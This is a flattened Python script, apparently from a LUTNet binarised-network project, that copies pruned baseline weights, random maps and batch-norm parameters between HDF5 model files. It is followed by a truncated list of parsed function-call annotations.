rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand] bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape) w1 = bl_w1 # connect1 only c1 = one_fill c2 = neg_one_fill c3 = one_fill c4 = neg_one_fill c5 = one_fill c6 = neg_one_fill c7 = one_fill c8 = neg_one_fill c9 = one_fill c10 = neg_one_fill c11 = one_fill c12 = neg_one_fill c13 = one_fill c14 = neg_one_fill c15 = one_fill c16 = neg_one_fill c17 = neg_one_fill c18 = one_fill c19 = neg_one_fill c20 = one_fill c21 = neg_one_fill c22 = one_fill c23 = neg_one_fill c24 = one_fill c25 = neg_one_fill c26 = one_fill c27 = neg_one_fill c28 = one_fill c29 = neg_one_fill c30 = one_fill c31 = neg_one_fill c32 = one_fill pret_w1 [...] = w1 pret_c1 [...] = c1 pret_c2 [...] = c2 pret_c3 [...] = c3 pret_c4 [...] = c4 pret_c5 [...] = c5 pret_c6 [...] = c6 pret_c7 [...] = c7 pret_c8 [...] = c8 pret_c9 [...] = c9 pret_c10[...] = c10 pret_c11[...] = c11 pret_c12[...] = c12 pret_c13[...] = c13 pret_c14[...] = c14 pret_c15[...] = c15 pret_c16[...] = c16 pret_c17[...] = c17 pret_c18[...] = c18 pret_c19[...] = c19 pret_c20[...] = c20 pret_c21[...] = c21 pret_c22[...] = c22 pret_c23[...] = c23 pret_c24[...] = c24 pret_c25[...] = c25 pret_c26[...] = c26 pret_c27[...] = c27 pret_c28[...] = c28 pret_c29[...] = c29 pret_c30[...] = c30 pret_c31[...] = c31 pret_c32[...] = c32 pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float) pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float) pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float) p_gamma[...] = np.array(bl_gamma) pret_means[...] = np.array(bl_means) pret_pruning_mask[...] = np.array(bl_pruning_mask) rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float) pret_rand_map_exp_0[...] = rand_map_0_expand rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float) pret_rand_map_exp_1[...] = rand_map_1_expand rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float) pret_rand_map_exp_2[...] = rand_map_2_expand print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask)))) # dense layer 5 bl_w1 = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_1:0"] bl_rand_map_0 = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_0:0"] bl_pruning_mask = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["pruning_mask:0"] bl_gamma = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable:0"] bl_means = bl["model_weights"]["residual_sign_4"]["residual_sign_4"]["means:0"] pret_rand_map_0 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_0:0"] pret_rand_map_1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_1:0"] pret_rand_map_2 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_2:0"] pret_pruning_mask = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["pruning_mask:0"] p_gamma = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable:0"] pret_means = pretrained["model_weights"]["residual_sign_4"]["residual_sign_4"]["means:0"] pret_c1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_1:0"] pret_c2 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_2:0"] pret_c3 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_3:0"] pret_c4 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_4:0"] pret_c5 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_5:0"] pret_c6 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_6:0"] pret_c7 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_7:0"] pret_c8 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_8:0"] pret_c9 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_9:0"] pret_c10= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_10:0"] pret_c11= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_11:0"] pret_c12= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_12:0"] pret_c13= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_13:0"] pret_c14= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_14:0"] pret_c15= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_15:0"] pret_c16= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_16:0"] pret_c17= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_17:0"] pret_c18= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_18:0"] pret_c19= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_19:0"] pret_c20= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_20:0"] pret_c21= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_21:0"] pret_c22= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_22:0"] pret_c23= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_23:0"] pret_c24= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_24:0"] pret_c25= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_25:0"] pret_c26= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_26:0"] pret_c27= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_27:0"] pret_c28= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_28:0"] pret_c29= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_29:0"] pret_c30= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_30:0"] pret_c31= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_31:0"] pret_c32= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_32:0"] pret_w1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_33:0"] pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_exp_0:0"] pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_exp_1:0"] pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_exp_2:0"] weight_shape = np.shape(bl_w1) tile_shape = np.shape(pret_c1) zero_fill = np.zeros(tile_shape) one_fill = np.ones(tile_shape) neg_one_fill = -np.ones(tile_shape) # randomisation and pruning recovery bl_w1_unroll = np.array(bl_w1) bl_w1 = np.array(bl_w1) rand_map_0 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_0) rand_map_1 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_1) rand_map_2 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_2) pruning_mask = np.array(bl_pruning_mask).astype(bool) init_mask = np.logical_not(pruning_mask[rand_map_0]) pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)] pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover) init_mask = np.reshape(init_mask, tile_shape) # expand randomisation map across tiles rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]]) rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]]) rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]]) for i in range(weight_shape[0]): rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand] bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape) w1 = bl_w1 # connect1 only c1 = one_fill c2 = neg_one_fill c3 = one_fill c4 = neg_one_fill c5 = one_fill c6 = neg_one_fill c7 = one_fill c8 = neg_one_fill c9 = one_fill c10 = neg_one_fill c11 = one_fill c12 = neg_one_fill c13 = one_fill c14 = neg_one_fill c15 = one_fill c16 = neg_one_fill c17 = neg_one_fill c18 = one_fill c19 = neg_one_fill c20 = one_fill c21 = neg_one_fill c22 = one_fill c23 = neg_one_fill c24 = one_fill c25 = neg_one_fill c26 = one_fill c27 = neg_one_fill c28 = one_fill c29 = neg_one_fill c30 = one_fill c31 = neg_one_fill c32 = one_fill pret_w1 [...] = w1 pret_c1 [...] = c1 pret_c2 [...] = c2 pret_c3 [...] = c3 pret_c4 [...] = c4 pret_c5 [...] = c5 pret_c6 [...] = c6 pret_c7 [...] = c7 pret_c8 [...] = c8 pret_c9 [...] = c9 pret_c10[...] = c10 pret_c11[...] = c11 pret_c12[...] = c12 pret_c13[...] = c13 pret_c14[...] = c14 pret_c15[...] = c15 pret_c16[...] = c16 pret_c17[...] = c17 pret_c18[...] = c18 pret_c19[...] = c19 pret_c20[...] = c20 pret_c21[...] = c21 pret_c22[...] = c22 pret_c23[...] = c23 pret_c24[...] = c24 pret_c25[...] = c25 pret_c26[...] = c26 pret_c27[...] = c27 pret_c28[...] = c28 pret_c29[...] = c29 pret_c30[...] = c30 pret_c31[...] = c31 pret_c32[...] = c32 pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float) pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float) pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float) p_gamma[...] = np.array(bl_gamma) pret_means[...] = np.array(bl_means) pret_pruning_mask[...] = np.array(bl_pruning_mask) rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float) pret_rand_map_exp_0[...] = rand_map_0_expand rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float) pret_rand_map_exp_1[...] = rand_map_1_expand rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float) pret_rand_map_exp_2[...] = rand_map_2_expand print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask)))) # bn 1 bl_beta = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["beta:0"] bl_gamma = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["gamma:0"] bl_moving_mean = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_mean:0"] bl_moving_variance = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_variance:0"] p_beta = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["beta:0"] p_gamma = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["gamma:0"] p_moving_mean = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_mean:0"] p_moving_variance = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_variance:0"] p_beta[...] = np.array(bl_beta) p_gamma[...] = np.array(bl_gamma) p_moving_mean[...] = np.array(bl_moving_mean) p_moving_variance[...] = np.array(bl_moving_variance) # bn 2 bl_beta = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["beta:0"] bl_gamma = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["gamma:0"] bl_moving_mean = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_mean:0"] bl_moving_variance = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_variance:0"] p_beta = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["beta:0"] p_gamma = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["gamma:0"] p_moving_mean = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_mean:0"] p_moving_variance = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_variance:0"] p_beta[...] = np.array(bl_beta) p_gamma[...] = np.array(bl_gamma) p_moving_mean[...] = np.array(bl_moving_mean) p_moving_variance[...] = np.array(bl_moving_variance) # bn 3 bl_beta = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["beta:0"] bl_gamma = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["gamma:0"] bl_moving_mean = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_mean:0"] bl_moving_variance = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_variance:0"] p_beta = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["beta:0"] p_gamma = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["gamma:0"] p_moving_mean = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_mean:0"] p_moving_variance = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_variance:0"] p_beta[...] = np.array(bl_beta) p_gamma[...] = np.array(bl_gamma) p_moving_mean[...] = np.array(bl_moving_mean) p_moving_variance[...] = np.array(bl_moving_variance) # bn 4 bl_beta = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["beta:0"] bl_gamma = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["gamma:0"] bl_moving_mean = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_mean:0"] bl_moving_variance = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_variance:0"] p_beta = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["beta:0"] p_gamma = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["gamma:0"] p_moving_mean = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_mean:0"] p_moving_variance = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_variance:0"] p_beta[...] = np.array(bl_beta) p_gamma[...] = np.array(bl_gamma) p_moving_mean[...] = np.array(bl_moving_mean) p_moving_variance[...] = np.array(bl_moving_variance) # bn 5 bl_beta = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["beta:0"] bl_gamma = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["gamma:0"] bl_moving_mean = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_mean:0"] bl_moving_variance = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_variance:0"] p_beta = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["beta:0"] p_gamma = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["gamma:0"] p_moving_mean = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_mean:0"] p_moving_variance = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_variance:0"] p_beta[...] = np.array(bl_beta) p_gamma[...] = np.array(bl_gamma) p_moving_mean[...] = np.array(bl_moving_mean) p_moving_variance[...] = np.array(bl_moving_variance) pretrained.close()
[((3, 0, 3, 37), 'numpy.set_printoptions', 'np.set_printoptions', (), '', True, 'import numpy as np\n'), ((7, 0, 7, 48), 'shutil.copyfile', 'copyfile', ({(7, 9, 7, 26): '"""dummy_lutnet.h5"""', (7, 28, 7, 47): '"""pretrained_bin.h5"""'}, {}), "('dummy_lutnet.h5', 'pretrained_bin.h5')", False, 'from shutil import copyfile\n'), ((9, 5, 9, 41), 'h5py.File', 'h5py.File', ({(9, 15, 9, 35): '"""baseline_pruned.h5"""', (9, 37, 9, 40): '"""r"""'}, {}), "('baseline_pruned.h5', 'r')", False, 'import h5py\n'), ((11, 13, 11, 49), 'h5py.File', 'h5py.File', ({(11, 23, 11, 42): '"""pretrained_bin.h5"""', (11, 44, 11, 48): '"""r+"""'}, {}), "('pretrained_bin.h5', 'r+')", False, 'import h5py\n'), ((23, 15, 23, 30), 'numpy.array', 'np.array', ({(23, 24, 23, 29): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((24, 15, 24, 33), 'numpy.array', 'np.array', ({(24, 24, 24, 32): 'bl_gamma'}, {}), '(bl_gamma)', True, 'import numpy as np\n'), ((25, 25, 25, 50), 'numpy.array', 'np.array', ({(25, 34, 25, 49): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((81, 15, 81, 30), 'numpy.shape', 'np.shape', ({(81, 24, 81, 29): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((82, 13, 82, 30), 'numpy.shape', 'np.shape', ({(82, 22, 82, 29): 'pret_c1'}, {}), '(pret_c1)', True, 'import numpy as np\n'), ((83, 12, 83, 32), 'numpy.zeros', 'np.zeros', ({(83, 21, 83, 31): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((84, 11, 84, 30), 'numpy.ones', 'np.ones', ({(84, 19, 84, 29): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((88, 15, 88, 30), 'numpy.array', 'np.array', ({(88, 24, 88, 29): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((89, 8, 89, 23), 'numpy.array', 'np.array', ({(89, 17, 89, 22): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((91, 13, 91, 37), 'numpy.arange', 'np.arange', ({(91, 23, 91, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((92, 0, 92, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(92, 18, 92, 28): 'rand_map_0'}, {}), '(rand_map_0)', True, 'import numpy as np\n'), ((93, 13, 93, 37), 'numpy.arange', 'np.arange', ({(93, 23, 93, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((94, 0, 94, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(94, 18, 94, 28): 'rand_map_1'}, {}), '(rand_map_1)', True, 'import numpy as np\n'), ((95, 13, 95, 37), 'numpy.arange', 'np.arange', ({(95, 23, 95, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((96, 0, 96, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(96, 18, 96, 28): 'rand_map_2'}, {}), '(rand_map_2)', True, 'import numpy as np\n'), ((99, 12, 99, 52), 'numpy.logical_not', 'np.logical_not', ({(99, 27, 99, 51): 'pruning_mask[rand_map_0]'}, {}), '(pruning_mask[rand_map_0])', True, 'import numpy as np\n'), ((101, 15, 101, 64), 'numpy.logical_or', 'np.logical_or', ({(101, 29, 101, 41): 'pruning_mask', (101, 43, 101, 63): 'pruning_mask_recover'}, {}), '(pruning_mask, pruning_mask_recover)', True, 'import numpy as np\n'), ((102, 12, 102, 45), 'numpy.reshape', 'np.reshape', ({(102, 23, 102, 32): 'init_mask', (102, 34, 102, 44): 'tile_shape'}, {}), '(init_mask, tile_shape)', True, 'import numpy as np\n'), ((106, 20, 106, 71), 'numpy.tile', 'np.tile', ({(106, 28, 106, 38): 'rand_map_0', (106, 39, 106, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((107, 20, 107, 71), 'numpy.tile', 'np.tile', ({(107, 28, 107, 38): 'rand_map_1', (107, 39, 107, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((108, 20, 108, 71), 'numpy.tile', 'np.tile', ({(108, 28, 108, 38): 'rand_map_2', (108, 39, 108, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((115, 15, 115, 53), 'numpy.reshape', 'np.reshape', ({(115, 26, 115, 38): 'bl_w1_rand_0', (115, 40, 115, 52): 'weight_shape'}, {}), '(bl_w1_rand_0, weight_shape)', True, 'import numpy as np\n'), ((190, 15, 190, 33), 'numpy.array', 'np.array', ({(190, 24, 190, 32): 'bl_gamma'}, {}), '(bl_gamma)', True, 'import numpy as np\n'), ((191, 18, 191, 36), 'numpy.array', 'np.array', ({(191, 27, 191, 35): 'bl_means'}, {}), '(bl_means)', True, 'import numpy as np\n'), ((192, 25, 192, 50), 'numpy.array', 'np.array', ({(192, 34, 192, 49): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((255, 15, 255, 30), 'numpy.shape', 'np.shape', ({(255, 24, 255, 29): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((256, 13, 256, 30), 'numpy.shape', 'np.shape', ({(256, 22, 256, 29): 'pret_c1'}, {}), '(pret_c1)', True, 'import numpy as np\n'), ((257, 12, 257, 32), 'numpy.zeros', 'np.zeros', ({(257, 21, 257, 31): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((258, 11, 258, 30), 'numpy.ones', 'np.ones', ({(258, 19, 258, 29): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((262, 15, 262, 30), 'numpy.array', 'np.array', ({(262, 24, 262, 29): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((263, 8, 263, 23), 'numpy.array', 'np.array', ({(263, 17, 263, 22): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((265, 13, 265, 37), 'numpy.arange', 'np.arange', ({(265, 23, 265, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((266, 0, 266, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(266, 18, 266, 28): 'rand_map_0'}, {}), '(rand_map_0)', True, 'import numpy as np\n'), ((267, 13, 267, 37), 'numpy.arange', 'np.arange', ({(267, 23, 267, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((268, 0, 268, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(268, 18, 268, 28): 'rand_map_1'}, {}), '(rand_map_1)', True, 'import numpy as np\n'), ((269, 13, 269, 37), 'numpy.arange', 'np.arange', ({(269, 23, 269, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((270, 0, 270, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(270, 18, 270, 28): 'rand_map_2'}, {}), '(rand_map_2)', True, 'import numpy as np\n'), ((273, 12, 273, 52), 'numpy.logical_not', 'np.logical_not', ({(273, 27, 273, 51): 'pruning_mask[rand_map_0]'}, {}), '(pruning_mask[rand_map_0])', True, 'import numpy as np\n'), ((275, 15, 275, 64), 'numpy.logical_or', 'np.logical_or', ({(275, 29, 275, 41): 'pruning_mask', (275, 43, 275, 63): 'pruning_mask_recover'}, {}), '(pruning_mask, pruning_mask_recover)', True, 'import numpy as np\n'), ((276, 12, 276, 45), 'numpy.reshape', 'np.reshape', ({(276, 23, 276, 32): 'init_mask', (276, 34, 276, 44): 'tile_shape'}, {}), '(init_mask, tile_shape)', True, 'import numpy as np\n'), ((280, 20, 280, 71), 'numpy.tile', 'np.tile', ({(280, 28, 280, 38): 'rand_map_0', (280, 39, 280, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((281, 20, 281, 71), 'numpy.tile', 'np.tile', ({(281, 28, 281, 38): 'rand_map_1', (281, 39, 281, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((282, 20, 282, 71), 'numpy.tile', 'np.tile', ({(282, 28, 282, 38): 'rand_map_2', (282, 39, 282, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((289, 15, 289, 53), 'numpy.reshape', 'np.reshape', ({(289, 26, 289, 38): 'bl_w1_rand_0', (289, 40, 289, 52): 'weight_shape'}, {}), '(bl_w1_rand_0, weight_shape)', True, 'import numpy as np\n'), ((364, 15, 364, 33), 'numpy.array', 'np.array', ({(364, 24, 364, 32): 'bl_gamma'}, {}), '(bl_gamma)', True, 'import numpy as np\n'), ((365, 18, 365, 36), 'numpy.array', 'np.array', ({(365, 27, 365, 35): 'bl_means'}, {}), '(bl_means)', True, 'import numpy as np\n'), ((366, 25, 366, 50), 'numpy.array', 'np.array', ({(366, 34, 366, 49): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((429, 15, 429, 30), 'numpy.shape', 'np.shape', ({(429, 24, 429, 29): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((430, 13, 430, 30), 'numpy.shape', 'np.shape', ({(430, 22, 430, 29): 'pret_c1'}, {}), '(pret_c1)', True, 'import numpy as np\n'), ((431, 12, 431, 32), 'numpy.zeros', 'np.zeros', ({(431, 21, 431, 31): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((432, 11, 432, 30), 'numpy.ones', 'np.ones', ({(432, 19, 432, 29): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((436, 15, 436, 30), 'numpy.array', 'np.array', ({(436, 24, 436, 29): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((437, 8, 437, 23), 'numpy.array', 'np.array', ({(437, 17, 437, 22): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((439, 13, 439, 37), 'numpy.arange', 'np.arange', ({(439, 23, 439, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((440, 0, 440, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(440, 18, 440, 28): 'rand_map_0'}, {}), '(rand_map_0)', True, 'import numpy as np\n'), ((441, 13, 441, 37), 'numpy.arange', 'np.arange', ({(441, 23, 441, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((442, 0, 442, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(442, 18, 442, 28): 'rand_map_1'}, {}), '(rand_map_1)', True, 'import numpy as np\n'), ((443, 13, 443, 37), 'numpy.arange', 'np.arange', ({(443, 23, 443, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((444, 0, 444, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(444, 18, 444, 28): 'rand_map_2'}, {}), '(rand_map_2)', True, 'import numpy as np\n'), ((447, 12, 447, 52), 'numpy.logical_not', 'np.logical_not', ({(447, 27, 447, 51): 'pruning_mask[rand_map_0]'}, {}), '(pruning_mask[rand_map_0])', True, 'import numpy as np\n'), ((449, 15, 449, 64), 'numpy.logical_or', 'np.logical_or', ({(449, 29, 449, 41): 'pruning_mask', (449, 43, 449, 63): 'pruning_mask_recover'}, {}), '(pruning_mask, pruning_mask_recover)', True, 'import numpy as np\n'), ((450, 12, 450, 45), 'numpy.reshape', 'np.reshape', ({(450, 23, 450, 32): 'init_mask', (450, 34, 450, 44): 'tile_shape'}, {}), '(init_mask, tile_shape)', True, 'import numpy as np\n'), ((454, 20, 454, 71), 'numpy.tile', 'np.tile', ({(454, 28, 454, 38): 'rand_map_0', (454, 39, 454, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((455, 20, 455, 71), 'numpy.tile', 'np.tile', ({(455, 28, 455, 38): 'rand_map_1', (455, 39, 455, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((456, 20, 456, 71), 'numpy.tile', 'np.tile', ({(456, 28, 456, 38): 'rand_map_2', (456, 39, 456, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((463, 15, 463, 53), 'numpy.reshape', 'np.reshape', ({(463, 26, 463, 38): 'bl_w1_rand_0', (463, 40, 463, 52): 'weight_shape'}, {}), '(bl_w1_rand_0, weight_shape)', True, 'import numpy as np\n'), ((538, 15, 538, 33), 'numpy.array', 'np.array', ({(538, 24, 538, 32): 'bl_gamma'}, {}), '(bl_gamma)', True, 'import numpy as np\n'), ((539, 18, 539, 36), 'numpy.array', 'np.array', ({(539, 27, 539, 35): 'bl_means'}, {}), '(bl_means)', True, 'import numpy as np\n'), ((540, 25, 540, 